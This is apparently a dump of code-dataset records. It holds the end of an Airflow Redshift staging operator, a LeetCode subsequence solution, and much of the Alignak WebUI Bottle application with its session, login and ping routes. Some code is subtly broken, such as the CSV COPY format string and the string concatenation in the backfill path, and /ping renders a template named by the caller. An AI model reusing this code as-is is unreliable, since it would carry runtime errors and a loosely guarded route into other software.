Data may be in either json or csv format\n Support back fill of data if required.\n '''\n self.log.info(f\"Staging data to {self.table}\")\n aws_hook = AwsHook(self.aws_credentials_id)\n credentials = aws_hook.get_credentials()\n redshift = PostgresHook(postgres_conn_id=self.redshift_conn_id)\n \n self.log.info(f\"Truncate stage table: {self.table}\")\n redshift.run(\"TRUNCATE TABLE {}\".format(self.table)) \n\n if self.backfill:\n exec_date = self.execution_date.format(**context)\n self.log.info(\"Execution_date: {}\".format(exec_date))\n exec_date_obj = datetime.datetime.strptime( exec_date ,'%Y-%m-%d')\n year = exec_date_obj.year\n month = exec_date_obj.month\n s3_source = self.s3_source+'/'+year+'/'+month\n self.s3_source = s3_source\n self.log.info(\"Execution_date: {}\".format(s3_source))\n \n self.log.info(f\"Load data to staging table: {self.table}\")\n if self.file_type == \"JSON\":\n copy_query = \"\"\"\n COPY {table}\n FROM '{s3_source}' \n ACCESS_KEY_ID '{access_key}'\n SECRET_ACCESS_KEY '{secret_key}'\n {file_type} '{json_paths}';\n \"\"\".format(table=self.table,\n s3_source=self.s3_source,\n access_key=credentials.access_key,\n secret_key=credentials.secret_key,\n file_type=self.file_type,\n json_paths=self.json_paths)\n elif self.file_type == \"CSV\":\n copy_query = \"\"\"\n COPY {table}\n FROM '{s3_source}'\n ACCESS_KEY_ID '{access_key}'\n SECRET_ACCESS_KEY '{secret_key}'\n IGNOREHEADER {}\n DELIMITER '{}'\n {file_type};\n \"\"\".format(table=self.table,\n s3_source=self.s3_source,\n access_key=credentials.access_key,\n secret_key=credentials.secret_key,\n file_type=self.file_type,\n delimiter=self.delimiter,\n ignore_headers=self.ignore_headers)\n else:\n self.log.error(\"Unsupported input file type\")\n raise ValueError(\"Unsupported input file type.\")\n\n redshift.run(copy_query)\n \n self.log.info(f\"Completed loading data to {self.table}\")\n\n\n\n\n\n","repo_name":"msankar/dataengineer-nd","sub_path":"projects/airflow_datapipeline/airflow/plugins/operators/stage_redshift.py","file_name":"stage_redshift.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"44068583819","text":"from heapq import heappush, heappop\nfrom collections import defaultdict\nclass Solution:\n def isPossible(self, nums: List[int]) -> bool:\n \n if not nums: return True\n \n queue = defaultdict(list) # key = value of last element in subsequence; value = [(length_of_subsequence, subsequence_identifier)]\n \n for num in nums:\n if queue[num-1]:\n length = heappop(queue[num-1])\n heappush(queue[num], length+1)\n else:\n heappush(queue[num], 1)\n \n for heap in queue.values():\n while heap:\n if heap.pop() < 3: return False\n \n return True","repo_name":"arw2019/AlgorithmsDataStructures","sub_path":"Split Array into Consecutive Subsequences/Leetcode_659.py","file_name":"Leetcode_659.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71375369962","text":"import os\nimport errno\nimport time\nimport datetime\nimport json\nimport logging\nimport threading\n\nfrom six import string_types\n\n# Session management\nfrom beaker.middleware import SessionMiddleware\n\n# Command line interpreter\nfrom docopt import docopt, DocoptExit\n\n# Bottle Web framework\nimport bottle\nfrom bottle import run, abort, redirect, request, response, static_file\nfrom bottle import template, BaseTemplate, 
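# Illustrative sketch (not part of the original operator): the CSV branch of
# StageToRedshiftOperator above formats a template that still contains the
# positional placeholders 'IGNOREHEADER {}' and "DELIMITER '{}'" while only
# keyword arguments are passed to str.format(), which raises an IndexError at
# runtime. A corrected template with the same (assumed) field names:
def build_csv_copy_query(table, s3_source, access_key, secret_key,
                         ignore_headers=1, delimiter=","):
    return """
        COPY {table}
        FROM '{s3_source}'
        ACCESS_KEY_ID '{access_key}'
        SECRET_ACCESS_KEY '{secret_key}'
        IGNOREHEADER {ignore_headers}
        DELIMITER '{delimiter}'
        CSV;
    """.format(table=table, s3_source=s3_source, access_key=access_key,
               secret_key=secret_key, ignore_headers=ignore_headers,
               delimiter=delimiter)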
TEMPLATE_PATH\nfrom bottle import RouteBuildError, parse_auth\n\n# Application import\nfrom alignak_webui import __manifest__, set_app_config\nfrom alignak_webui.utils.logger import setup_logging, ROOT_LOGGER_NAME\nfrom alignak_webui.utils.locales import init_localization\nfrom alignak_webui.backend.backend import BackendException\nfrom alignak_webui.backend.datamanager import DataManager\nfrom alignak_webui.webui import WebUI\n\napp = application = bottle.Bottle()\n\n# -----\n# Simple mode for the application\n# -----\nif os.environ.get('ALIGNAK_WEBUI_REDUCED', False):\n print(\"Application is in reduced mode. No backend, no authentication. \"\n \"Simple Alignak WS reading!\")\n\n# -----\n# Test mode for the application\n# -----\nif os.environ.get('ALIGNAK_WEBUI_TEST', False):\n print(\"Application is in test mode\")\nelse: # pragma: no cover, because tests are run in test mode\n print(\"Application is in production mode\")\n\nargs = {}\nif __name__ == '__main__':\n try:\n print(\"Parsing command line arguments\")\n args = docopt(__doc__, version=__manifest__['version'])\n except DocoptExit as exp:\n print(\"Command line parsing error: \\n%s\" % exp)\n exit(64)\n\n# -----\n# Application configuration file\n# -----\napp_name = __manifest__['name'].lower()\n# Search for configuration files in several locations\ncfg_filenames = [\n '/usr/local/etc/%s/settings.cfg' % app_name,\n '/etc/%s/settings.cfg' % app_name,\n '~/%s/settings.cfg' % app_name,\n os.path.abspath('./etc/%s/settings.cfg' % app_name),\n os.path.abspath('../etc/settings.cfg'),\n os.path.abspath('./etc/settings.cfg'),\n os.path.abspath('./settings.cfg'),\n]\n# Configuration file name in environment\nif os.environ.get('ALIGNAK_WEBUI_CONFIGURATION_FILE'):\n cfg_filenames = [os.environ.get('ALIGNAK_WEBUI_CONFIGURATION_FILE')]\n print(\"Application configuration file name from environment: %s\" % cfg_filenames)\n# Configuration file name in command line parameters\nif '' in args and args['']: # pragma: no cover, tested but not coverable\n cfg_filenames = args['']\n print(\"Application configuration file name from command line: %s\" % cfg_filenames)\n\n\napp_configuration_file = None\nfor cfg_filename in cfg_filenames:\n if os.path.isfile(cfg_filename):\n app.config.load_config(cfg_filename)\n print(\"Configuration read from: %s\" % cfg_filename)\n app_configuration_file = cfg_filename\n break\nelse: # pragma: no cover, tested but not coverable\n print(\"***** Application configuration file not found.\")\n print(\"***** Searched in: %s\" % cfg_filenames)\n exit(1)\n\n# -----\n# Check application configuration file change\n# -----\n# todo: not yet tested\nif os.environ.get('ALIGNAK_WEBUI_CONFIGURATION_THREAD'): # pragma: no cover, not yet tested\n def check_config(_app, filename, interval=5):\n \"\"\"Thread to check if configuration file changed\"\"\"\n print(\"Thread for checking configuration file change, file: %s\" % filename)\n modification_time = os.path.getmtime(filename)\n while True:\n time.sleep(interval)\n print(\"Checking configuration file change...\")\n if modification_time < os.path.getmtime(filename):\n print(\"Application configuration file changed, reloading configuration...\")\n modification_time = os.path.getmtime(filename)\n _app.config.load_config(filename)\n cfg_check_thread = threading.Thread(target=check_config,\n name='application_configuration_check',\n args=(app, app_configuration_file, 10))\n cfg_check_thread.daemon = True\n cfg_check_thread.start()\n\n# -----\n# Debug and test mode\n# -----\nenv_debug = 
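# Illustrative sketch (not part of the original application): the settings
# lookup above uses Python's for/else -- the else branch runs only when the
# loop finished without a break, i.e. when no candidate file matched:
import os

def find_first_existing(candidates):
    for path in candidates:
        if os.path.isfile(path):
            break                    # first existing file wins
    else:
        return None                  # loop ended without a break: no match
    return path

# e.g. find_first_existing(['/etc/app/settings.cfg', './settings.cfg'])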
os.environ.get('BOTTLE_DEBUG', False)\nif env_debug and env_debug == '1': # pragma: no cover, tested but not coverable\n app.config['bottle.debug'] = True\n print(\"Bottle is in debug mode from environment\")\n\nenv_debug = os.environ.get('ALIGNAK_WEBUI_DEBUG', False)\nif env_debug and env_debug == '1': # pragma: no cover, tested but not coverable\n app.config['%s.debug' % app_name] = True\n print(\"Application is in debug mode from environment\")\n\nif '--debug' in args and args['--debug']: # pragma: no cover, tested but not coverable\n app.config['bottle.debug'] = True\n app.config['%s.debug' % app_name] = True\n print(\"Application is in debug mode from command line\")\n\n# -----\n# Application backend\n# -----\nif os.environ.get('ALIGNAK_WEBUI_BACKEND'): # pragma: no cover, tested but not coverable\n app.config['%s.alignak_backend' % app_name] = os.environ.get('ALIGNAK_WEBUI_BACKEND')\n print(\"Application backend from environment: %s\" % os.environ.get('ALIGNAK_WEBUI_BACKEND'))\nif '--backend' in args and args['--backend']: # pragma: no cover, tested but not coverable\n app.config['%s.alignak_backend' % app_name] = args['--backend']\n print(\"Application backend from command line: %s\" % args['--backend'])\n\nprint(\"Application backend: %s\" % app.config.get('%s.alignak_backend' % app_name,\n 'http://127.0.0.1:5000'))\n\n# -----\n# Alignak web services\n# -----\nif os.environ.get('ALIGNAK_WEBUI_WS'):\n app.config['%s.alignak_ws' % app_name] = os.environ.get('ALIGNAK_WEBUI_WS')\n print(\"Alignak Web Services from environment: %s\" % os.environ.get('ALIGNAK_WEBUI_WS'))\nif '--ws' in args and args['--ws']:\n app.config['%s.alignak_ws' % app_name] = args['--ws']\n print(\"Alignak Web Services from command line: %s\" % args['--ws'])\n\nprint(\"Alignak Web Services: %s\" % app.config.get('%s.alignak_ws' % app_name,\n 'http://127.0.0.1:8888'))\n\nif '--host' in args and args['--host']: # pragma: no cover, tested but not coverable\n app.config['host'] = args['--host']\n print(\"Listening interface from command line: %s\" % app.config.get('host', '127.0.0.1'))\n\nif '--port' in args and args['--port']: # pragma: no cover, tested but not coverable\n app.config['port'] = args['--port']\n print(\"Listening port from command line: %s\" % app.config.get('port', '5001'))\n\n# -----\n# Application log\n# -----\n# Set application log level (default is INFO\nlog_level = 'INFO'\nif app.config.get('%s.debug' % app_name, False): # pragma: no cover - not testable easily...\n print(\"-> Activated DEBUG log\")\n log_level = 'DEBUG'\nif os.environ.get('ALIGNAK_WEBUI_LOG_LEVEL'): # pragma: no cover, tested but not coverable\n log_level = os.environ.get('ALIGNAK_WEBUI_LOG_LEVEL', 'INFO')\n print(\"Application log level from environment: %s\" % log_level)\n\n# Search log file location\nlog_locations = [\n '/usr/local/var/log/%s' % app_name,\n '/var/log/%s' % app_name,\n '/tmp/%s' % app_name\n]\nif os.environ.get('ALIGNAK_WEBUI_LOG_DIR'): # pragma: no cover, tested but not coverable\n log_locations = [os.environ.get('ALIGNAK_WEBUI_LOG_DIR')]\n print(\"Application log directory from environment: %s\"\n % os.environ.get('ALIGNAK_WEBUI_LOG_DIR'))\nfor log_location in log_locations:\n if os.path.isdir(log_location):\n print(\"Log file location: %s\" % log_location)\n break\nelse:\n print(\"***** Log files location not found.\")\n print(\"***** Searched in: %s\" % log_locations)\n log_location = '/tmp/%s' % app_name\n os.mkdir(log_location)\n try:\n os.makedirs(log_location)\n dir_stat = os.stat(log_location)\n 
print(\"Created the directory: %s, stat: %s\" % (log_location, dir_stat))\n except OSError as exp:\n if exp.errno == errno.EEXIST and os.path.isdir(log_location):\n # Directory still exists...\n pass\n else:\n print(\"Daemon directory '%s' did not exist, and I could not create. Exception: %s\"\n % (log_location, exp))\n exit(3)\n\n# Search logger configuration\ncfg_log_filenames = [\n '/usr/local/etc/%s/logging.json' % app_name,\n '/etc/%s/logging.json' % app_name,\n '/usr/local/share/%s/etc/logging.json' % app_name,\n '~/%s/logging.json' % app_name,\n os.path.abspath('../etc/logging.json'),\n os.path.abspath('./etc/logging.json'),\n os.path.abspath('./logging.json'),\n]\nif os.environ.get('ALIGNAK_WEBUI_LOGGER_FILE'): # pragma: no cover, tested but not coverable\n cfg_log_filenames = [os.environ.get('ALIGNAK_WEBUI_LOGGER_FILE')]\n print(\"Application logger configuration file from environment: %s\"\n % os.environ.get('ALIGNAK_WEBUI_LOGGER_FILE'))\n\napp_logger_file = None\nlogger = None\nfor cfg_log_filename in cfg_log_filenames:\n if setup_logging(cfg_log_filename, log_location):\n logger = logging.getLogger(ROOT_LOGGER_NAME)\n logger.setLevel(log_level)\n print(\"Application logger configured from: %s\" % cfg_log_filename)\n break\nelse: # pragma: no cover, tested but not coverable\n print(\"***** Application logger configuration file not found.\")\n print(\"***** Searched in: %s\" % cfg_log_filenames)\n exit(2)\n\nlogger.info(\"--------------------------------------------------------------------------------\")\nlogger.info(\"%s, version %s\", __manifest__['name'], __manifest__['version'])\nlogger.info(\"Copyright %s\", __manifest__['copyright'])\nlogger.info(\"License: %s\", __manifest__['license'])\nlogger.info(\"--------------------------------------------------------------------------------\")\nlogger.info(\"Doc: %s\", __manifest__['doc'])\nlogger.info(\"Release notes: %s\", __manifest__['release'])\nlogger.info(\"--------------------------------------------------------------------------------\")\n\nlogger.info(\"Application logger configured from: %s\", cfg_log_filename)\n\nlogger.info(\"--------------------------------------------------------------------------------\")\nlogger.info(\"configuration read from: %s\", cfg_filename)\nlogger.info(\"listening on %s:%d (debug mode: %s)\",\n app.config.get('host', '127.0.0.1'), int(app.config.get('port', '5001')),\n app.config.get('%s.debug' % app_name, False))\nlogger.info(\"using Alignak Backend on %s\",\n app.config.get('%s.alignak_backend' % app_name, 'http://127.0.0.1:5000'))\nlogger.info(\"using Alignak Web Services on %s\",\n app.config.get('%s.alignak_ws' % app_name, 'http://127.0.0.1:8888'))\nlogger.info(\"--------------------------------------------------------------------------------\")\n\nlogger.debug(\"Application settings: \")\n# Make the 'application.key' also available as 'key'\nadd_to_config = {}\nfor key, value in sorted(app.config.items()):\n if key.startswith(app_name):\n add_to_config[key.replace(app_name + '.', '')] = value\n if isinstance(value, string_types):\n value = value.replace('\\n', '')\n logger.debug(\" %s = %s\", key, value)\nlogger.debug(\"--------------------------------------------------------------------------------\")\nlogger.debug(\"Webui settings: \")\nfor key, value in list(add_to_config.items()):\n app.config[key] = value\n logger.debug(\" %s = %s\", key, value)\nlogger.debug(\"--------------------------------------------------------------------------------\")\n\n# -----\n# Application 
localization\n# -----\n_ = init_localization(app)\n# Update configuration with translation method to use\napp.config['_'] = _\n# Provide translation methods to templates\nBaseTemplate.defaults['_'] = _\nprint(_(\"Language is English (default)...\"))\n\n# -----\n# Application extension\n# -----\nwebapp = WebUI(app, name=app_name, config=app.config)\nBaseTemplate.defaults['webui'] = webapp\napp.config['webui'] = webapp\n\n# -----\n# Application layout configuration\n# -----\nif os.environ.get('ALIGNAK_WEBUI_TOP_TEN_HOSTS', False):\n print(\"Application displays the top ten hosts\")\n BaseTemplate.defaults['top_ten_hosts'] = True\n\n\n# -----\n# Gloval application configuration\n# -----\nset_app_config(app.config)\n\n\n# -----\n# Application static files\n# -----\n@app.route('/static/')\ndef static(filename):\n \"\"\"Main application static files\n\n Plugins declare their own static routes under /plugins\n \"\"\"\n if not filename.startswith('plugins'):\n return static_file(\n filename, root=os.path.join(os.path.abspath(os.path.dirname(__file__)), 'static')\n )\n return static_file(\n filename, root=os.path.abspath(os.path.dirname(__file__))\n )\n\n\n# -----\n# Application modal windows\n# -----\n# todo: to be tested...\n@app.route('/modal/')\ndef give_modal(modal_name):\n \"\"\"Return template for a modal window\"\"\"\n logger.debug(\"get modal window named: %s\", modal_name)\n return template('modal_' + modal_name)\n\n\n# --------------------------------------------------------------------------------------------------\n# WebUI hooks\n# --------------------------------------------------------------------------------------------------\n@app.hook('config')\ndef on_config_change(_key, _value): # pragma: no cover, not yet tested\n \"\"\"Hook called if configuration dictionary changed\"\"\"\n logger.warning(\"application configuration changed, key: %s = %s\", _key, _value)\n if _key.startswith(app_name):\n app.config[_key.replace(app_name + '.', '')] = _value\n logger.warning(\"application configuration changed, *** key: %s = %s\",\n _key.replace(app_name + '.', ''), _value)\n\n\n@app.hook('before_request')\ndef before_request():\n # pylint: disable=unsupported-membership-test, unsubscriptable-object\n \"\"\"Function called since an HTTP request is received, and before any other function.\n\n Checks if a user session exists\n\n Some URLs do not need any authentication:\n - ping, heartbeat mechanism used for page or page elements refresh\n - login / logout\n - static files (js, css, ...)\n \"\"\"\n logger.debug(\"before_request, url: %s %s\", request.method, request.urlparts.path)\n\n # Static application and plugins files\n if request.urlparts.path.startswith('/static'):\n return\n\n # External URLs routing ...\n if request.urlparts.path.startswith('/external'):\n return\n\n # Login/logout specific URLs routing ...\n if request.urlparts.path.startswith('/login'):\n return\n if request.urlparts.path.startswith('/logout'):\n return\n\n # Get the server session (it always exist...)\n session = request.environ['beaker.session']\n sct = datetime.datetime.fromtimestamp(session['_creation_time']).strftime('%Y-%m-%d %H:%M:%S')\n sat = datetime.datetime.fromtimestamp(session['_accessed_time']).strftime('%Y-%m-%d %H:%M:%S')\n logger.debug(\"client: %s, route: %s, session: %s / %s - %s / %s\",\n request.environ.get('HTTP_X_FORWARDED_FOR') or request.environ.get('REMOTE_ADDR'),\n request.urlparts.path,\n session.id, sct, sat, session)\n\n current_user = None\n if 'current_user' in session:\n current_user = 
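# Illustrative sketch (not part of the original application): values placed
# in BaseTemplate.defaults, as done above for '_' and 'webui', become visible
# in every template without being passed explicitly:
from bottle import BaseTemplate, SimpleTemplate

BaseTemplate.defaults['site_name'] = 'Demo'      # hypothetical key

tpl = SimpleTemplate('Welcome to {{site_name}}!')
print(tpl.render())                              # -> Welcome to Demo!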
session['current_user']\n\n # Session authentication ...\n if not current_user:\n # ping and heartbeat URLs have a specific HTTP status code\n if request.urlparts.path.startswith('/ping'):\n abort(401, json.dumps({'status': 'ok', 'message': 'No user session'}))\n\n if request.urlparts.path.startswith('/heartbeat'):\n logger.error(\"no user: %s\", current_user)\n abort(401, json.dumps({'status': 'ok', 'message': 'Session expired'}))\n\n origin = request.environ.get('HTTP_X_FORWARDED_FOR') or request.environ.get('REMOTE_ADDR')\n logger.debug(\"client: %s, cookie: %s\", origin, request.environ.get('HTTP_COOKIE'))\n\n # Stop Alignak backend thread\n # ***** Not yet implemented...\n\n # Redirect to application login page\n logger.warning(\"Requesting %s. \"\n \"The session expired or there is no user in the session. \"\n \"Redirecting to the login page...\", request.urlparts.path)\n\n redirect('/login')\n\n # Authenticate the session user\n logger.debug(\"webapp: %s, request app: %s\", webapp, request.app)\n logger.info(\"current_user: %s\", current_user)\n if not webapp.user_authentication(current_user.token, None, session):\n # Redirect to application login page\n logger.warning(\"user in the session is not authenticated. \"\n \"Redirecting to the login page...\")\n redirect('/login')\n\n # Make session current user available in the templates\n BaseTemplate.defaults['current_user'] = current_user\n\n # Make session edition mode available in the templates\n if 'edition_mode' not in session:\n session['edition_mode'] = False\n BaseTemplate.defaults['edition_mode'] = session['edition_mode']\n logger.debug(\"before_request, edition mode: %s\", session['edition_mode'])\n\n logger.debug(\"webapp + datamgr: %s / %s\", webapp, webapp.datamgr)\n\n # Initialize data manager and make it available in the request and in the templates\n # if webapp.datamgr is None: # pragma: no cover, should never happen!\n webapp.datamgr = DataManager(request.app, session=session)\n if not webapp.datamgr.connected:\n redirect('/login')\n\n # Load initial objects from the DM\n # request.app.datamgr = DataManager(webapp, session=session)\n request.app.datamgr = webapp.datamgr\n request.app.datamgr.load()\n # Do not yet remove this... 
will be made later;)\n # if request.app.datamgr.logged_in_user.get_username() != 'admin':\n # logger.warning(\"client: %s, session: %s, cookie: %s, route: %s\",\n # request.environ.get('HTTP_X_FORWARDED_FOR') or\n # request.environ.get('REMOTE_ADDR'),\n # session.id,\n # request.environ.get('HTTP_COOKIE'),\n # request.urlparts.path)\n # logger.warning(\"request.app.datamgr: %s\", request.app.datamgr)\n # else:\n # logger.error(\"client: %s, session: %s, cookie: %s, route: %s\",\n # request.environ.get('HTTP_X_FORWARDED_FOR') or\n # request.environ.get('REMOTE_ADDR'),\n # session.id,\n # request.environ.get('HTTP_COOKIE'),\n # request.urlparts.path)\n # logger.error(\"request.app.datamgr: %s\", request.app.datamgr)\n logger.debug(\"request.app.datamgr: %s\", request.app.datamgr)\n BaseTemplate.defaults['datamgr'] = request.app.datamgr\n\n logger.debug(\"before_request, call function for route: %s\", request.urlparts.path)\n\n\n# --------------------------------------------------------------------------------------------------\n# Home page and login\n# --------------------------------------------------------------------------------------------------\n@app.route('/', 'GET')\ndef home_page():\n \"\"\"Display home page -> redirect to /Livestate\"\"\"\n try:\n redirect(request.app.get_url('Livestate'))\n except RouteBuildError: # pragma: no cover, should never happen!\n return \"No home page available in the application routes!\"\n\n return\n\n\n@app.route('/login', 'GET')\ndef user_login():\n \"\"\"Display user login page\"\"\"\n session = request.environ['beaker.session']\n message = None\n if 'login_message' in session and session['login_message']:\n message = session['login_message']\n session['login_message'] = None\n logger.warning(\"login page with error message: %s\", message)\n\n # Send login form\n return template(\n 'login', {\n 'message': message\n }\n )\n\n\n@app.route('/logout', 'GET')\ndef user_logout():\n \"\"\"Log-out the current logged-in user\n\n Clear and delete the user session\n \"\"\"\n # Delete the user session\n session = request.environ['beaker.session']\n session.delete()\n # Now session is an empty dictionary...\n\n # Log-out from application\n logger.info(\"Logout for current user\")\n\n redirect('/login')\n\n\n# todo: not yet implemented... 
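# Illustrative sketch (not part of the original application): a stripped-down
# version of the session gate implemented by before_request() above -- every
# route except a few public prefixes requires a logged-in user in the beaker
# session (assumes the app is wrapped in SessionMiddleware, as done near the
# end of this module):
import bottle
from bottle import request, redirect

demo_app = bottle.Bottle()
PUBLIC_PREFIXES = ('/static', '/external', '/login', '/logout')

@demo_app.hook('before_request')
def require_login():
    path = request.urlparts.path
    if path.startswith(PUBLIC_PREFIXES):
        return                        # public routes skip authentication
    session = request.environ.get('beaker.session', {})
    if not session.get('current_user'):
        redirect('/login')            # no authenticated user in the session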
see #172\ndef check_backend_connection(_app, token=None, interval=10): # pragma: no cover, not yet!\n \"\"\"Thread to check if backend connection is alive\"\"\"\n print(\"Thread for checking backend connection is alive with %s\" % app.config['alignak_backend'])\n\n object_type = 'user'\n params = {}\n while True:\n time.sleep(interval)\n if not token:\n continue\n print(\"Checking backend connection...\")\n try:\n result = _app.datamgr.my_backend.get(object_type, params=params, all_elements=False)\n logger.debug(\"check_backend_connection, found: %s: %s\", object_type, result)\n except BackendException as exp: # pragma: no cover, simple protection\n logger.exception(\"object_type, exception: %s\", exp)\n raise ValueError(\n '%s, search: %s was not found in the backend' % (object_type, params)\n )\n\n\n@app.route('/login', 'POST')\ndef user_auth():\n \"\"\"Receive user login parameters (username / password) to authenticate a user\n\n Allowed authentication:\n - username/password from a login form\n - token and empty password\n \"\"\"\n username = request.forms.get('username', None)\n password = request.forms.get('password', None)\n logger.info(\"login, user '%s' is signing in ...\", username)\n\n session = request.environ['beaker.session']\n session['login_message'] = None\n\n # Empty password?\n if not password: # pragma: no cover, should never happen, tested before calling this function!\n # Redirect to application login page with an error message\n session['login_message'] = _(\"Login is not authorized without a password\")\n logger.warning(\"user '%s' access denied, no passowrd provided\", username)\n redirect('/login')\n\n if not webapp.user_authentication(username, password, session):\n # Redirect to application login page with an error message\n if 'login_message' not in session:\n session['login_message'] = _(\"Invalid username or password\")\n logger.warning(\"user '%s' access denied, message: %s\", username, session['login_message'])\n redirect('/login')\n\n session['edition_mode'] = False\n logger.info(\"user '%s' (%s) signed in\", username, session['current_user'].name)\n\n # -----\n # Start Alignak backend thread\n # -----\n # pylint: disable=fixme\n # TODO: run backend connection check thread\n # cfg_backend_thread = threading.Thread(target=check_backend_connection,\n # name='backend_connection_check',\n # args=(app, session['current_user'].token, 10))\n # cfg_backend_thread.daemon = True\n # cfg_backend_thread.start()\n\n redirect('/')\n\n\n# --------------------------------------------------------------------------------------------------\n# Ping / heartbeat\n# --------------------------------------------------------------------------------------------------\n@app.route('/heartbeat')\ndef heartbeat():\n \"\"\"Application heartbeat\"\"\"\n session = request.environ['beaker.session']\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok',\n 'message': \"Current logged-in user: %s\"\n % session['current_user'].get_username()})\n\n\n@app.route('/ping')\ndef ping():\n # pylint: disable=too-many-return-statements\n \"\"\"Request on /ping is a simple check alive that returns an information if UI refresh is needed\n\n Else, the specified `action` may be:\n - done, to inform that the server required action has been performed by the client\n - refresh, to get some information from a specified `template`\n\n If no action is specified, the application answers with a JSON pong ;)\n\n Used by the header refresh to update the hosts/services 
live state.\n \"\"\"\n session = request.environ['beaker.session']\n action = request.query.get('action', None)\n if action == 'done':\n # Acknowledge UI refresh\n session['refresh_required'] = False\n logger.debug(\"ping, refresh: %s\", session['refresh_required'])\n elif action == 'refresh':\n page_template = request.query.get('template', None)\n if page_template:\n # Send rendered template\n return template(page_template)\n\n # pragma: no cover - should not happen\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok',\n 'message': 'missing template name. '\n 'Use /ping?action=refresh&template=name.'})\n elif action:\n response.status = 204\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok',\n 'message': 'Unknown ping action parameter: %s' % action})\n\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok', 'message': 'pong'})\n\n\n# --------------------------------------------------------------------------------------------------\n# WebUI routes\n# --------------------------------------------------------------------------------------------------\n# CORS decorator\ndef enable_cors(fn):\n \"\"\"CORS decorator\n\n Send the CORS headers for ajax request\n \"\"\"\n def _enable_cors(*_args, **_kwargs):\n # set CORS headers\n response.headers['Access-Control-Allow-Origin'] = \\\n request.app.config.get('cors_acao', 'http://127.0.0.1')\n response.headers['Access-Control-Allow-Methods'] = 'GET, POST, PUT, OPTIONS'\n response.headers['Access-Control-Allow-Headers'] = \\\n 'Origin, Accept, Authorization, X-HTTP-Method-Override, If-Match, Content-Type'\n response.headers['Access-Control-Allow-Credentials'] = 'true'\n\n if bottle.request.method != 'OPTIONS':\n # actual request; reply with the actual response\n return fn(*_args, **_kwargs)\n\n # response.status = 204\n return\n\n return _enable_cors\n\n\n@app.route('/external///', method=['GET', 'POST', 'OPTIONS'])\n@app.route('/external//', method=['GET', 'POST', 'OPTIONS'])\n@enable_cors\ndef external(widget_type, identifier, action=None):\n # pylint: disable=too-many-return-statements, unsupported-membership-test\n # pylint: disable=unsubscriptable-object, too-many-locals\n \"\"\"Application external identifier\n\n Use internal authentication (if a user is logged-in) or external basic authentication provided\n by the requiring application.\n\n Search in the known 'widget_type' (widget or table) to find the element 'identifier'.\n\n Use the 'links' parameter to prefix the navigation URLs.\n \"\"\"\n\n logger.warning(\"external request, url: %s %s\", request.method, request.urlparts.path)\n\n # Get the WebUI instance\n webui = request.app.config['webui']\n\n # Get the server session (it always exist...)\n session = request.environ['beaker.session']\n st = datetime.datetime.fromtimestamp(session['_creation_time']).strftime('%Y-%m-%d %H:%M:%S')\n origin = request.environ.get('HTTP_X_FORWARDED_FOR') or request.environ.get('REMOTE_ADDR')\n logger.debug(\"client: %s, session: %s / %s / %s\", origin, session.id, st, session)\n\n current_user = None\n if 'current_user' in session and session['current_user']:\n current_user = session['current_user']\n\n # Get the application instance authentication\n logger.debug(\"webapp: %s, request app: %s\", webapp, request.app)\n logger.debug(\"current_user: %s\", current_user)\n if not webapp.user_authentication(current_user.token, None, session):\n # Redirect to application login page\n 
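# Illustrative sketch (not part of the original application): the /ping
# route above supports three call shapes. A hypothetical client using the
# requests library (not a dependency of this module); the template name
# 'livestate' is made up for the example:
import requests

BASE = 'http://127.0.0.1:5001'        # assumed listening address

def refresh_cycle(cookies):
    # 1) plain keep-alive: expects {'status': 'ok', 'message': 'pong'}
    pong = requests.get(BASE + '/ping', cookies=cookies).json()
    # 2) ask the server to render a page fragment for a partial refresh
    fragment = requests.get(BASE + '/ping', cookies=cookies,
                            params={'action': 'refresh',
                                    'template': 'livestate'}).text
    # 3) acknowledge that the client applied the refresh
    requests.get(BASE + '/ping', cookies=cookies, params={'action': 'done'})
    return pong, fragment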
logger.warning(\"External request. User in the session is not authenticated. \"\n \"Redirecting to the login page...\")\n redirect('/login')\n credentials = current_user.token + ':'\n\n else:\n # Authenticate external access...\n if 'Authorization' not in request.headers or not request.headers['Authorization']:\n logger.warning(\"external application access denied\")\n response.status = 401\n response.content_type = 'text/html'\n return _(\n '
<center>'\n '<h3>External access denied.</h3>'\n '<p>To embed an Alignak WebUI widget or table, you must provide credentials.<br>'\n 'Log into the Alignak WebUI with your credentials, or make a request '\n 'with a Basic-Authentication allowing access to Alignak backend.</p>'\n '</center>'\n )\n\n
# Get HTTP authentication\n authentication = request.headers.get('Authorization')\n username, password = parse_auth(authentication)\n\n # Get the application instance authentication\n logger.debug(\"external application, checking authentication for %s\", username)\n if not webapp.user_authentication(username, password, session):\n logger.warning(\"external application access denied for %s\", username)\n response.status = 401\n response.content_type = 'text/html'\n return _(\n '<center>'\n '<h3>External access denied.</h3>'\n '<p>The provided credentials do not grant you access to Alignak WebUI.<br>'\n 'Please provide proper credentials.</p>'\n '</center>'\n )\n\n
current_user = session['current_user']\n credentials = current_user.token + ':'\n\n # Make session data available in the templates\n BaseTemplate.defaults['current_user'] = session['current_user']\n\n # Make data manager available in the request and in the templates\n request.app.datamgr = DataManager(webapp, session=session)\n request.app.datamgr.load()\n logger.warning(\"request.app.datamgr: %s\", request.app.datamgr)\n BaseTemplate.defaults['datamgr'] = request.app.datamgr\n\n logger.info(\"External request, element type: %s\", widget_type)\n\n if widget_type not in ['files', 'widget', 'table', 'list', 'host', 'service', 'user']:\n logger.warning(\"External application requested unknown type: %s\", widget_type)\n response.status = 409\n response.content_type = 'text/html'\n return _(\n '<h3>Unknown required type: %s.</h3>'\n '<p>The required type is unknown.</p>' % widget_type\n )\n\n
if widget_type == 'files':\n if identifier == 'js_list':\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok', 'files': webui.js_list})\n\n if identifier == 'css_list':\n response.status = 200\n response.content_type = 'application/json'\n return json.dumps({'status': 'ok', 'files': webui.css_list})\n\n logger.warning(\"External application requested unknown files: %s\", identifier)\n response.status = 409\n response.content_type = 'application/json'\n return json.dumps({'status': 'ko', 'message': \"Unknown files list: %s\" % identifier})\n\n
